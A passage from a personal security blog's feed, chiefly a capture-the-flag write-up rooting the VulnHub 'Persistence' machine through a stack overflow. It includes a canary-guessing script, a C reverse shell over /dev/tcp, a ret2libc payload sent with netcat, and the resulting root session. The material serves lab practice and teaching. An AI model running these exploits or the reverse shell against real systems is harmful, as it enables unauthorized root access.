<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>...(truncated)...
</span><span class='line'>
</span><span class='line'>*** stack smashing detected ***: ./wopr terminated
</span><span class='line'>======= Backtrace: =========
</span><span class='line'>/lib/libc.so.6(__fortify_fail+0x4d)[0x727f4d]
</span><span class='line'>/lib/libc.so.6(+0xfcefa)[0x727efa]
</span><span class='line'>./wopr[0x80487dc]
</span><span class='line'>[0x33624132]
</span><span class='line'>
</span><span class='line'>...(truncated)...</span></code></pre></td></tr></table></div></figure>


<p>And find the offset!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 33624132
</span><span class='line'>[*] Exact match at offset 38</span></code></pre></td></tr></table></div></figure>


<p>So, we need to overwrite 38 bytes before we get to the return address. Also, remember about a canary and base pointer. So we have:</p>

<p>buffer (30 bytes) + canary (4 bytes) + base pointer (4 bytes) + return address (4 bytes)</p>

<p>Cool, so now knowing all of our offsets, we can craft something for guessing a canary! There&rsquo;s one more thing though&hellip; how do we know when we have guessed a right byte in the canary value so we can move on to the next byte? Let&rsquo;s have a look at the output returned by the server.</p>

<p>Successful response (no buffer overflow):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ nc localhost 3333
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>&gt; yes
</span><span class='line'>[+] yeah, I don't think so
</span><span class='line'>[+] bye!</span></code></pre></td></tr></table></div></figure>


<p>Failed response (buffer overflow):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ python -c 'print "A" * 30 + "CCCC" + "BBBB" + "DDDD"' | nc localhost 3333
</span><span class='line'>[+] hello, my name is sploitable
</span><span class='line'>[+] would you like to play a game?
</span><span class='line'>&gt; [+] yeah, I don't think so</span></code></pre></td></tr></table></div></figure>


<p>Do you see the difference? Whenever we behave as the server expects us to behave, it greets us with &ldquo;bye!&rdquo; message, otherwise - it doesn&rsquo;t. That&rsquo;s the indicator when the guess was successful!</p>

<p>It didn&rsquo;t take too long to come up with a quick and dirty (very dirty) script to guess a canary value:</p>

<figure class='code'><figcaption><span>Guessing canary value </span></figcaption>
<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="kn">import</span> <span class="nn">socket</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Guess canary</span>
</span><span class='line'><span class="n">found</span> <span class="o">=</span> <span class="bp">False</span>
</span><span class='line'><span class="n">base_buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">30</span>    <span class="c"># our buffer size is 30</span>
</span><span class='line'><span class="k">for</span> <span class="n">count</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">4</span><span class="p">):</span>
</span><span class='line'>  <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="p">[</span><span class="s">&#39;0&#39;</span><span class="p">,</span><span class="s">&#39;1&#39;</span><span class="p">,</span><span class="s">&#39;2&#39;</span><span class="p">,</span><span class="s">&#39;3&#39;</span><span class="p">,</span><span class="s">&#39;4&#39;</span><span class="p">,</span><span class="s">&#39;5&#39;</span><span class="p">,</span><span class="s">&#39;6&#39;</span><span class="p">,</span><span class="s">&#39;7&#39;</span><span class="p">,</span><span class="s">&#39;8&#39;</span><span class="p">,</span><span class="s">&#39;9&#39;</span><span class="p">,</span><span class="s">&#39;a&#39;</span><span class="p">,</span><span class="s">&#39;b&#39;</span><span class="p">,</span><span class="s">&#39;c&#39;</span><span class="p">,</span><span class="s">&#39;d&#39;</span><span class="p">,</span><span class="s">&#39;e&#39;</span><span class="p">,</span><span class="s">&#39;f&#39;</span><span class="p">]:</span>
</span><span class='line'>      <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="p">[</span><span class="s">&#39;0&#39;</span><span class="p">,</span><span class="s">&#39;1&#39;</span><span class="p">,</span><span class="s">&#39;2&#39;</span><span class="p">,</span><span class="s">&#39;3&#39;</span><span class="p">,</span><span class="s">&#39;4&#39;</span><span class="p">,</span><span class="s">&#39;5&#39;</span><span class="p">,</span><span class="s">&#39;6&#39;</span><span class="p">,</span><span class="s">&#39;7&#39;</span><span class="p">,</span><span class="s">&#39;8&#39;</span><span class="p">,</span><span class="s">&#39;9&#39;</span><span class="p">,</span><span class="s">&#39;a&#39;</span><span class="p">,</span><span class="s">&#39;b&#39;</span><span class="p">,</span><span class="s">&#39;c&#39;</span><span class="p">,</span><span class="s">&#39;d&#39;</span><span class="p">,</span><span class="s">&#39;e&#39;</span><span class="p">,</span><span class="s">&#39;f&#39;</span><span class="p">]:</span>
</span><span class='line'>          <span class="nb">buffer</span> <span class="o">=</span> <span class="n">base_buffer</span> <span class="o">+</span> <span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'>          <span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span><span class='line'>          <span class="n">sock</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s">&quot;localhost&quot;</span><span class="p">,</span> <span class="mi">3333</span><span class="p">))</span>
</span><span class='line'>          <span class="n">data</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
</span><span class='line'>          <span class="n">sock</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="nb">buffer</span><span class="p">)</span>
</span><span class='line'>          <span class="n">data</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
</span><span class='line'>          <span class="n">data</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
</span><span class='line'>          <span class="k">if</span> <span class="s">&quot;bye&quot;</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
</span><span class='line'>              <span class="k">print</span> <span class="s">&quot;</span><span class="se">\\</span><span class="s">x&quot;</span> <span class="o">+</span> <span class="n">i</span> <span class="o">+</span> <span class="n">j</span>
</span><span class='line'>              <span class="n">base_buffer</span> <span class="o">+=</span> <span class="p">(</span><span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&#39;hex&#39;</span><span class="p">)</span>
</span><span class='line'>              <span class="n">found</span> <span class="o">=</span> <span class="bp">True</span>
</span><span class='line'>              <span class="k">break</span>
</span><span class='line'>          <span class="n">sock</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span><span class='line'>      <span class="k">if</span> <span class="n">found</span><span class="p">:</span>
</span><span class='line'>          <span class="n">found</span> <span class="o">=</span> <span class="bp">False</span>
</span><span class='line'>          <span class="k">break</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s run it&hellip;</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ ./guess_canary.py
</span><span class='line'>\x97
</span><span class='line'>\x29
</span><span class='line'>\x40
</span><span class='line'>\x13</span></code></pre></td></tr></table></div></figure>


<p>And we have a canary! (So far just on local CentOS).</p>

<p>Alright, now what can we do? How about typical buffer overflow, find some shellcode to chuck it on the stack, then point back to it and spawn a shell? Well, sounds good, but only in theory. Running very handy script below <a href="http://www.trapkit.de/tools/checksec.html">checksec.sh</a> we can find out more about our binary:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>[knaps@localhost ~]$ ./checksec.sh --file wopr
</span><span class='line'>RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
</span><span class='line'>Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   wopr</span></code></pre></td></tr></table></div></figure>


<p>Turns out there&rsquo;s NX (non-executable) stack protection mechanism as well - meaning that we can&rsquo;t execute code from data portions of the program. Hmm, bummer!</p>

<p>What else is there&hellip; running below program we can quickly determine that address of the stack pointer doesn&rsquo;t change - hence ASLR (Address Layout Space Randomization) must be disabled!</p>

<figure class='code'><figcaption><span>Finding stack pointer </span></figcaption>
<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
</pre></td><td class='code'><pre><code class='c'><span class='line'><span class="cp">#include &lt;stdlib.h&gt;</span>
</span><span class='line'><span class="cp">#include &lt;stdio.h&gt;</span>
</span><span class='line'>
</span><span class='line'><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">get_sp</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
</span><span class='line'><span class="p">{</span>
</span><span class='line'>  <span class="n">__asm__</span><span class="p">(</span><span class="s">&quot;mov %esp, %eax&quot;</span><span class="p">);</span>
</span><span class='line'><span class="p">}</span>
</span><span class='line'>
</span><span class='line'><span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
</span><span class='line'><span class="p">{</span>
</span><span class='line'>  <span class="n">printf</span><span class="p">(</span><span class="s">&quot;0x%x</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">,</span> <span class="n">get_sp</span><span class="p">());</span>
</span><span class='line'><span class="p">}</span>
</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ gcc sp.c -o sp
</span><span class='line'>bash-4.1$ ./sp 
</span><span class='line'>0xbffff6e8
</span><span class='line'>bash-4.1$ ./sp 
</span><span class='line'>0xbffff6e8
</span><span class='line'>bash-4.1$ ./sp 
</span><span class='line'>0xbffff6e8</span></code></pre></td></tr></table></div></figure>


<p>Ok, that&rsquo;s very good news - it means that stack, variables and libraries would always be at the same position - that&rsquo;s a very handy piece of information we can utilise.</p>

<p>After hours and hours of research I found this technique called &ldquo;ret2libc&rdquo; - basically what it means is that you point the code into a function in the libc library (that is generally imported by most Unix programs) and call functions from there. One really interesting function is system(), which executes whatever command you pass to it as an argument. That sounds pretty awesome! All we need is to find out the address of system() function - which shouldn&rsquo;t be hard since ASLR is disabled and functions will always be at the same place in the memory. AWESOME!</p>

<p>There&rsquo;s one little problem though&hellip; you need to pass in a string with whatever you want to run into the system() function call. So, I want to run something along the lines of /bin/bash, how can I pass it in? I need to find it somewhere in memory so I can pass its address onto the stack to be interpreted as an argument passed to the function. Alright, but, where do I find it? Generally you can set an environment variable to whatever you like, run the program, get string from environment variable and run system(), simple. Yeah, but on persistence wopr is already running, we can&rsquo;t stop it and restart it with new environment variables&hellip; and of course you can&rsquo;t change the environment of a running process (at least not without root permissions).</p>

<p>We&rsquo;ll need to utilise something else. Also, simply calling /bin/bash won&rsquo;t work, as it would be spawned by server and nothing would have happened for us - we actually need a reverse shell that we would be able to connect to after.</p>

<p>Again, after hours of research I couldn&rsquo;t really come up with anything. Took a break from it and then, one sunny Friday morning, while still lying in bed trying to wake up, it hit me! Remember /tmp/log variable that we found earlier? Yeah, I forgot it too! What we can do is - create a simple program or script creating a reverse shell, call it &ldquo;log&rdquo;, place it in /tmp, find /tmp/log string in the binary (it would be saved as a variable somewhere), pass it in to system() function, which then will run our /tmp/log program and bam! We&rsquo;ve got a shell!</p>

<p>And that&rsquo;s exactly what I did next. Let&rsquo;s get back to my Kali VM where I already have established SSH to persistence.</p>

<p>First, the /tmp/log program. I went ahead with C and simply creating reverse shell connecting to port 31337. Also I make sure to se setuid and setgid to keep permissions of a calling process (root!).</p>

<figure class='code'><figcaption><span>Reverse shell </span></figcaption>
<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class='c'><span class='line'><span class="cp">#include &lt;stdlib.h&gt;</span>
</span><span class='line'>
</span><span class='line'><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span><span class='line'><span class="p">{</span>
</span><span class='line'>  <span class="n">setuid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span><span class='line'>  <span class="n">setgid</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
</span><span class='line'>  <span class="n">system</span><span class="p">(</span><span class="s">&quot;/bin/sh 0&lt;/dev/tcp/localhost/31337 1&gt;&amp;0 2&gt;&amp;0&quot;</span><span class="p">);</span>
</span><span class='line'><span class="p">}</span>
</span></code></pre></td></tr></table></div></figure>


<p>Sweet, compiled it and saved as /tmp/log.</p>

<p>Next, let&rsquo;s find /tmp/log variable in the binary itself. That didn&rsquo;t take long either, just look at this part of disassembled code:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>0x08048985 &lt;+423&gt;: movl   $0x8048c60,0x4(%esp)
</span><span class='line'>0x0804898d &lt;+431&gt;:  movl   $0x8048c69,(%esp)
</span><span class='line'>0x08048994 &lt;+438&gt;:  call   0x804869c &lt;setenv@plt&gt;</span></code></pre></td></tr></table></div></figure>


<p>What&rsquo;s hidden under $0x8048c60?</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>(gdb) x/1s 0x8048c60
</span><span class='line'>0x8048c60 &lt;__dso_handle+80&gt;:     "/tmp/log"</span></code></pre></td></tr></table></div></figure>


<p>Gotchya!</p>

<p>Now we just need to find address of system() and exit() (to cleanly return from system() call) and we&rsquo;re almost done!</p>

<p>First, there&rsquo;s a small trick that needs to be done, since gdb still thinks we&rsquo;re using restricted shell, it won&rsquo;t allow us to run the program and therefore load symbols table to find out addresses of functions. To bypass this, we simply need to change $SHELL variable:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ echo $SHELL
</span><span class='line'>/bin/rbash
</span><span class='line'>bash-4.1$ SHELL=/bin/bash</span></code></pre></td></tr></table></div></figure>


<p>Now we can start up gdb, run the binary (it will fail anyway, but will load up symbols table) and find out addresses of interest.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ gdb -q wopr
</span><span class='line'>Reading symbols from /usr/local/bin/wopr...(no debugging symbols found)...done.
</span><span class='line'>(gdb) r
</span><span class='line'>Starting program: /usr/local/bin/wopr 
</span><span class='line'>bind: Address already in use
</span><span class='line'>
</span><span class='line'>Program exited with code 0142.
</span><span class='line'>Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
</span><span class='line'>(gdb) p system
</span><span class='line'>$1 = {&lt;text variable, no debug info&gt;} 0x16c210 &lt;system&gt;
</span><span class='line'>(gdb) p exit
</span><span class='line'>$2 = {&lt;text variable, no debug info&gt;} 0x15f070 &lt;exit&gt;
</span><span class='line'>(gdb) </span></code></pre></td></tr></table></div></figure>


<p>Cool, now we have all addresses, so we can begin crafting our payload. That&rsquo;s what we&rsquo;re aiming to achieve:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>.
</span><span class='line'>               -- Current --                    -- Target --
</span><span class='line'>    0000
</span><span class='line'>             ------------------              ------------------
</span><span class='line'>             |                |              |                |
</span><span class='line'>             |                |              | AAAAAAAAAAAAAA |
</span><span class='line'>       ^     |     Buffer     |   30 bytes   | AAAAAAAAAAAAAA |   Overflow buffer with dummy data
</span><span class='line'>       |     |                |              | AAAAAAAAAAA... |
</span><span class='line'>     stack   |                |              |                |
</span><span class='line'>     growth  ------------------              ------------------
</span><span class='line'>       |     |     Canary     |   4 bytes    |     Canary     |   Real canary, so we're not detected
</span><span class='line'>       |     ------------------              ------------------
</span><span class='line'>             |  Base pointer  |   4 bytes    |      BBBB      |   Dummy data to overwrite saved base pointer
</span><span class='line'>             ------------------              ------------------
</span><span class='line'>             | Return address |   4 bytes    |    system()    |   system() call
</span><span class='line'>             ------------------              ------------------
</span><span class='line'>             |                |              |     exit()     |   exit() which will be called upon returning from system()
</span><span class='line'>             |  Rest of the   |              ------------------
</span><span class='line'>             |     stack      |              |    /tmp/log    |   arguments to system() - our malicious program to run
</span><span class='line'>             |                |              ------------------
</span><span class='line'>             |      ...       |              |       ...      |
</span><span class='line'>    FFFF</span></code></pre></td></tr></table></div></figure>


<p>Basically, we&rsquo;re trying to create a stack frame as if we were calling a new function. Remember that everything is put onto the stack in reverse other, therefore we have (starting from the bottom of the stack - what came in first): function arguments and return address from the function (new EIP). And of course we overwrite old return address with system() call to have it executed.</p>

<p>From this, our payload will look something like this:</p>

<p>&ldquo;A&rdquo; * 30 + &ldquo;canary&rdquo; + &ldquo;BBBB&rdquo; + &ldquo;system()&rdquo; + &ldquo;exit()&rdquo; + &ldquo;/tmp/log&rdquo;.</p>

<p>Cool, so now we have all necessary components - size of the buffer, guessed canary, addresses of system, exit and /tmp/log. All we need now is to carefully craft a payload, remembering it&rsquo;s all in Little Endian, so memory addresses will be written in reverse, and send it to the server. Shall we?</p>

<p>Start the netcat listener:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ nc -l 31337</span></code></pre></td></tr></table></div></figure>


<p>Guess the canary (copy-paste source code onto persistence and run it):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ ./guess_canary.py
</span><span class='line'>\x89
</span><span class='line'>\xa6
</span><span class='line'>\x62
</span><span class='line'>\xc5</span></code></pre></td></tr></table></div></figure>


<p>Craft the exploit:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ python -c 'print "A" * 30 + "\x89\xa6\x62\xc5" + "BBBB" + "\x10\xc2\x16\x00" + "\x70\xf0\x15\x00" + "\x60\x8c\x04\08"' | nc localhost 3333</span></code></pre></td></tr></table></div></figure>


<p>Did it work?</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>bash-4.1$ nc -l 31337
</span><span class='line'>whoami 
</span><span class='line'>root
</span><span class='line'>hostname
</span><span class='line'>persistence
</span><span class='line'>id
</span><span class='line'>uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0</span></code></pre></td></tr></table></div></figure>


<p>Wooooooooooohooooooooooo! Root shell :D Let&rsquo;s get the flag:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>cd /root
</span><span class='line'>ls
</span><span class='line'>anaconda-ks.cfg
</span><span class='line'>flag.txt
</span><span class='line'>install.log
</span><span class='line'>install.log.syslog
</span><span class='line'>cat flag.txt
</span><span class='line'>              .d8888b.  .d8888b. 888    
</span><span class='line'>             d88P  Y88bd88P  Y88b888    
</span><span class='line'>             888    888888    888888    
</span><span class='line'>888  888  888888    888888    888888888 
</span><span class='line'>888  888  888888    888888    888888    
</span><span class='line'>888  888  888888    888888    888888    
</span><span class='line'>Y88b 888 d88PY88b  d88PY88b  d88PY88b.  
</span><span class='line'> "Y8888888P"  "Y8888P"  "Y8888P"  "Y888
</span><span class='line'>
</span><span class='line'>Congratulations!!! You have the flag!
</span><span class='line'>
</span><span class='line'>We had a great time coming up with the 
</span><span class='line'>challenges for this boot2root, and we 
</span><span class='line'>hope that you enjoyed overcoming them. 
</span><span class='line'>
</span><span class='line'>Special thanks goes out to @VulnHub for 
</span><span class='line'>hosting Persistence for us, and to 
</span><span class='line'>@recrudesce for testing and providing 
</span><span class='line'>valuable feedback! 
</span><span class='line'>
</span><span class='line'>Until next time, 
</span><span class='line'>      sagi- & superkojiman</span></code></pre></td></tr></table></div></figure>


<h2>Summary</h2>

<p>It was one awesome challenge, took me a bit, but learnt soooo much. I have a lot better understanding of buffer overflows and modern protection mechanisms. I haven&rsquo;t done so much research on a single topic for quite a long time, but I am very glad I did because now I feel a lot more comfortable dealing with this kinds of vulnerabilities and crafting my own exploits :) Hope there&rsquo;ll be more challenges like this to come!</p>

<p>Also, I could have written a fully automated exploit at the end, but I thought I&rsquo;ll keep it like this, quite manual and low level as I think it shows better exactly what has been done and how I have approached the problem :) Also, since this one is pwned already, honestly I can&rsquo;t be bothered writing up prettier exploits - I rather move on to smashing another VMs :)</p>

<h2>References</h2>

<ul>
<li><a href="http://www.trapkit.de/tools/checksec.html">checksec.sh</a></li>
<li><a href="http://www.offensive-security.com/metasploit-unleashed/Writing_An_Exploit">Making Something Go Boom (Metasploit)</a></li>
<li><a href="http://beej.us/guide/bggdb/">Beej&rsquo;s Quick Guide to GDB</a></li>
<li><a href="http://insecure.org/stf/smashstack.html">Smashing The Stack For Fun And Profit</a></li>
<li><a href="http://www.intelligentexploit.com/articles/Linux-Stack-Based-Buffer-Overflows.pdf">Stack based buffer overflow exploitation - tutorial</a></li>
<li><a href="http://phrack.org/issues/67/13.html">Scraps of notes on remote stack overflow exploitation</a></li>
<li><a href="https://github.com/Malformation/Notes/blob/master/ret2libc.txt">Exploitation - Returning into libc</a></li>
<li><a href="https://www.soldierx.com/tutorials/Stack-Smashing-Modern-Linux-System">Stack Smashing On A Modern Linux System</a></li>
<li><a href="http://protostar-solutions.googlecode.com/hg/Stack%206/ret2libc.pdf">Performing a ret2libc Attack (defeating a non-executable stack)</a></li>
</ul>

]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[First Post]]></title>
    <link href="http://blog.knapsy.com/blog/2014/10/02/first-post/"/>
    <updated>2014-10-02T23:09:00+10:00</updated>
    <id>http://blog.knapsy.com/blog/2014/10/02/first-post</id>
    <content type="html"><![CDATA[<p>First test post with Octopress and at the same time, first post on my first ever blog!</p>

<p>I plan to use this blog as a bit of a brain dump of my ideas, tools and views, mainly focused on IT security.</p>

<p>I will try to post variety of things, ranging from code snippets, tools and techniques useful in penetration testing or security incident response, various CTF competition writeups (one coming up very soon!) and some other random, geeky stuff&hellip; at least that&rsquo;s a plan&hellip; :)</p>
]]></content>
  </entry>
  
</feed>